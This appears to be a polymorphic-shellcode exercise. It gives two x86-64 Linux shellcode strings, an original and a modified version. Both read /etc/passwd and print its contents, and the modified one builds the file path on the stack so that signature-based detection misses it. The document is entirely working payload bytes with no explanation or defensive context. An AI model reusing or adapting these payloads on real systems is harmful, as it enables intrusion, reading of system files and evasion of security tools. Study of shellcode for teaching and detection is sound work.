Original_Shellcode:

"\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31"
"\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89"
"\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48"
"\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01"
"\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff"
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41";

Original_shellcode lenght = 82 bytes

Modified_shellcode:

"\x4d\x31\xc9\x4d\x31\xd2\x41\xb9\x72\x62\x66\x63\x49\x81"
"\xc1\x01\x11\x11\x01\x41\x51\x49\xb9\x2e\x65\x74\x63\x2f"
"\x2f\x70\x61\x49\xff\xc1\x41\x51\x48\x8d\x3c\x24\x48\x31"
"\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48"
"\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48"
"\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2"
"\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05";

Modified_shellcode lenght = 98 bytes
